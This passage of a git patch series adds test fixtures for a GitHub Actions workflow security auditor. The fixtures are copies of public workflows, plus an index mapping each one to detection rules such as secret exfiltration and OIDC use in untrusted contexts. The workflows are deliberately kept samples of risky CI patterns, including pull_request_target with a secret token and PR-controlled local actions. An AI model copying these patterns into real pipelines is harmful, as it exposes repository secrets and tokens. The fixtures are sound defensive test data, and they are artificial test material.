persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-typecheck: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-typecheck-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: 
./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-typecheck-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-api-clients: + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-api-clients-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true + name: Verify API clients + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." 
+ file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-openapi: + # Run this workflow for OSS only + permissions: + contents: read + id-token: write + name: Verify OpenAPI specs + runs-on: ubuntu-x64-large + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Free up disk space + run: | + sudo rm -rf /usr/local/lib/android || true + sudo rm -rf /usr/share/dotnet || true + sudo rm -rf /opt/ghc || true + sudo rm -rf /usr/local/.ghcup || true + - name: Generate OpenAPI specs + run: | + extract_error_message='ERROR! OpenAPI generation failed!' + yarn generate:openapi || (echo "${extract_error_message}" && false) + - name: Verify generated specs + run: | + git add -N . + uncommited_error_message="ERROR! OpenAPI generation has not been committed. Please run 'yarn generate:openapi', commit the changes and push again." 
+ file_diff="$(git diff --name-only ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-api-clients-enterprise: + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false + name: Verify API clients (enterprise) + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." 
+ file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-packed-packages: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed-frontend-packages == 'true' + name: Verify packed frontend packages + runs-on: ubuntu-latest + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Build and pack packages + run: | + yarn run packages:build + yarn run packages:pack + - name: Validate packages + run: ./scripts/validate-npm-packages.sh + lint-circular-dependencies: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed == 'true' + name: Check circular dependencies + runs-on: ubuntu-x64-small + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + path: "./pr" + - name: Setup Node + uses: ./pr/.github/actions/setup-node + with: + cwd: "./pr" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install + with: + cwd: "./pr" + - name: Check circular dependencies on PR + # the first sed command is used to clean the output + working-directory: ./pr + run: | + yarn lint:circular &> /tmp/pr-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/pr-circular.txt > /tmp/pr-circular-clean.txt + echo "Circular dependencies on PR:" + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "$pr_count" + - name: Checkout main branch + uses: actions/checkout@v5 + with: + persist-credentials: false + repository: "grafana/grafana" + ref: "main" + path: "./main" + - name: Setup Node + uses: 
./pr/.github/actions/setup-node # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Check circular dependencies on main + working-directory: ./main + # the first sed command is used to clean the output + run: | + yarn lint:circular &> /tmp/main-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/main-circular.txt > /tmp/main-circular-clean.txt + echo "Circular dependencies on main:" + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + echo "$main_count" + - name: Compare circular dependencies + run: | + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "Main branch circular dependencies: $main_count lines" + echo "PR branch circular dependencies: $pr_count lines" + if [ "$pr_count" -gt "$main_count" ]; then + echo "🚨 ERROR: PR introduces new circular dependencies!" 
+ echo "Diff between main and PR:" + diff -u /tmp/main-circular-clean.txt /tmp/pr-circular-clean.txt || true + exit 1 + fi + + yarn-install-validation: + needs: + - detect-changes + if: needs.detect-changes.outputs.changed-frontend-dependencies == 'true' + runs-on: ubuntu-x64-small + name: Validate yarn install + permissions: + contents: read + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + + # Deliberately not using the yarn-install action for exact control over the command for extra checks + - name: Install yarn dependencies + run: yarn install --immutable --check-cache + env: + YARN_ENABLE_HARDENED_MODE: 1 diff --git a/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml b/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml new file mode 100644 index 0000000..60b38d1 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml @@ -0,0 +1,13 @@ +name: dependabot-auto-merge + +on: [pull_request_target] + +jobs: + auto-merge: + if: ${{ github.actor == 'dependabot[bot]' }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: ahmadnassri/action-dependabot-auto-merge@v2.3.1 + with: + github-token: ${{ secrets.DEPENDABOT_AUTO_MERGE_TOKEN }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml new file mode 100644 index 0000000..d307705 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml @@ -0,0 +1,329 @@ +name: Lint Frontend +on: + pull_request: + push: + branches: + - main + - release-*.*.* + 
+permissions: {} + +jobs: + detect-changes: + name: Detect whether code changed + runs-on: ubuntu-latest + permissions: + contents: read + outputs: + changed: ${{ steps.detect-changes.outputs.frontend }} + prettier: ${{ steps.detect-changes.outputs.frontend == 'true' || steps.detect-changes.outputs.docs == 'true' }} + changed-frontend-packages: ${{ steps.detect-changes.outputs.frontend-packages }} + changed-frontend-dependencies: ${{ steps.detect-changes.outputs.frontend-dependencies }} + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: true # required to get more history in the changed-files action + fetch-depth: 2 + - name: Detect changes + id: detect-changes + uses: ./.github/actions/change-detection + with: + self: .github/workflows/frontend-lint.yml + + lint-frontend-prettier: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-prettier-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-prettier-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - 
name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-typecheck: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-typecheck-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-typecheck-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-api-clients: + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets 
merged into `main` or `release-*`, + # the `lint-frontend-api-clients-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true + name: Verify API clients + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." + file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-openapi: + # Run this workflow for OSS only + permissions: + contents: read + id-token: write + name: Verify OpenAPI specs + runs-on: ubuntu-x64-large + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Free up disk space + run: | + sudo rm -rf /usr/local/lib/android || true + sudo rm -rf /usr/share/dotnet || true + sudo rm -rf /opt/ghc || true + sudo rm -rf /usr/local/.ghcup || true + - name: Generate OpenAPI specs + run: | + extract_error_message='ERROR! OpenAPI generation failed!' + yarn generate:openapi || (echo "${extract_error_message}" && false) + - name: Verify generated specs + run: | + git add -N . + uncommited_error_message="ERROR! OpenAPI generation has not been committed. Please run 'yarn generate:openapi', commit the changes and push again." 
+ file_diff="$(git diff --name-only ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-api-clients-enterprise: + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false + name: Verify API clients (enterprise) + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." 
+ file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-packed-packages: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed-frontend-packages == 'true' + name: Verify packed frontend packages + runs-on: ubuntu-latest + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Build and pack packages + run: | + yarn run packages:build + yarn run packages:pack + - name: Validate packages + run: ./scripts/validate-npm-packages.sh + lint-circular-dependencies: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed == 'true' + name: Check circular dependencies + runs-on: ubuntu-x64-small + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + path: "./pr" + - name: Setup Node + uses: ./pr/.github/actions/setup-node + with: + cwd: "./pr" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install + with: + cwd: "./pr" + - name: Check circular dependencies on PR + # the first sed command is used to clean the output + working-directory: ./pr + run: | + yarn lint:circular &> /tmp/pr-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/pr-circular.txt > /tmp/pr-circular-clean.txt + echo "Circular dependencies on PR:" + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "$pr_count" + - name: Checkout main branch + uses: actions/checkout@v5 + with: + persist-credentials: false + repository: "grafana/grafana" + ref: "main" + path: "./main" + - name: Setup Node + uses: 
./pr/.github/actions/setup-node # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Check circular dependencies on main + working-directory: ./main + # the first sed command is used to clean the output + run: | + yarn lint:circular &> /tmp/main-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/main-circular.txt > /tmp/main-circular-clean.txt + echo "Circular dependencies on main:" + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + echo "$main_count" + - name: Compare circular dependencies + run: | + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "Main branch circular dependencies: $main_count lines" + echo "PR branch circular dependencies: $pr_count lines" + if [ "$pr_count" -gt "$main_count" ]; then + echo "🚨 ERROR: PR introduces new circular dependencies!" 
+ echo "Diff between main and PR:" + diff -u /tmp/main-circular-clean.txt /tmp/pr-circular-clean.txt || true + exit 1 + fi + + yarn-install-validation: + needs: + - detect-changes + if: needs.detect-changes.outputs.changed-frontend-dependencies == 'true' + runs-on: ubuntu-x64-small + name: Validate yarn install + permissions: + contents: read + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + + # Deliberately not using the yarn-install action for exact control over the command for extra checks + - name: Install yarn dependencies + run: yarn install --immutable --check-cache + env: + YARN_ENABLE_HARDENED_MODE: 1 diff --git a/test-fixtures/workflow-audits/real-cases/index.json b/test-fixtures/workflow-audits/real-cases/index.json index 2db2c98..8761126 100644 --- a/test-fixtures/workflow-audits/real-cases/index.json +++ b/test-fixtures/workflow-audits/real-cases/index.json @@ -22,5 +22,47 @@ "target": "RC-04-dependabot-execution", "expected_rule": "dependabot-execution", "source": "https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml" + }, + { + "id": "RC-05-workflow-pr-target-checkout-head", + "target": "RC-05-workflow-pr-target-checkout-head", + "expected_rule": "workflow-pr-target-checkout-head", + "source": "https://github.com/antiwork/gumroad/blob/000969060793173ff7501038e4104794a5f842b1/.github/workflows/tests.yml" + }, + { + "id": "RC-06-workflow-artifact-trust-chain", + "target": "RC-06-workflow-artifact-trust-chain", + "expected_rule": "workflow-artifact-trust-chain", + "source": "https://github.com/facebook/react/blob/3e1abcc8d7083a13adf4774feb0d67ecbe4a2bc4/.github/workflows/runtime_build_and_test.yml" + }, + { + "id": "RC-07-workflow-call-boundary", + "target": "RC-07-workflow-call-boundary", + "expected_rule": "workflow-call-boundary", + "source": 
"https://github.com/valkey-io/valkey/blob/543a6b83dffff9d35da046ad2067a94b60cf3f38/.github/workflows/daily.yml" + }, + { + "id": "RC-08-workflow-secret-exfiltration", + "target": "RC-08-workflow-secret-exfiltration", + "expected_rule": "workflow-secret-exfiltration", + "source": "https://github.com/r-dbi/odbc/blob/02f4a32cacde3b24168cf4d28a18279e22c4939f/.github/workflows/db-pro.yaml" + }, + { + "id": "RC-09-workflow-oidc-untrusted-context", + "target": "RC-09-workflow-oidc-untrusted-context", + "expected_rule": "workflow-oidc-untrusted-context", + "source": "https://github.com/grafana/grafana/blob/2131a63ca06a161abcc1f46ff0352ca2ce3b06ca/.github/workflows/frontend-lint.yml" + }, + { + "id": "RC-10-dependabot-auto-merge", + "target": "RC-10-dependabot-auto-merge", + "expected_rule": "dependabot-auto-merge", + "source": "https://github.com/bflad/go-module-two/blob/b34d6ff790df1dec533198da4be2f9857199d725/.github/workflows/dependabot-auto-merge.yml" + }, + { + "id": "RC-11-workflow-local-action-mutation", + "target": "RC-11-workflow-local-action-mutation", + "expected_rule": "workflow-local-action-mutation", + "source": "https://github.com/grafana/grafana/blob/2131a63ca06a161abcc1f46ff0352ca2ce3b06ca/.github/workflows/frontend-lint.yml" } ] From 08928dd389ed1ed5e5869cc665373d94f81a5de4 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 15:10:40 +0000 Subject: [PATCH 6/6] test(workflow): split real-case checks into per-fixture tests --- tests/layer2/workflow-real-cases.test.ts | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tests/layer2/workflow-real-cases.test.ts b/tests/layer2/workflow-real-cases.test.ts index df2f23f..8529509 100644 --- a/tests/layer2/workflow-real-cases.test.ts +++ b/tests/layer2/workflow-real-cases.test.ts @@ -43,8 +43,8 @@ function loadRealCaseIndex(): RealCaseEntry[] { } describe("workflow real-case fixtures", () => { - it("detects expected 
findings on commit-pinned public workflow fixtures", async () => { - for (const fixture of loadRealCaseIndex()) { + for (const fixture of loadRealCaseIndex()) { + it(`${fixture.id} detects ${fixture.expected_rule} on commit-pinned fixture`, async () => { const targetPath = resolve( process.cwd(), "test-fixtures/workflow-audits/real-cases", @@ -62,6 +62,6 @@ describe("workflow real-case fixtures", () => { `${fixture.id} should detect ${fixture.expected_rule}`, ).toBe(true); expect(fixture.source.startsWith("https://github.com/")).toBe(true); - } - }); + }, 20_000); + } });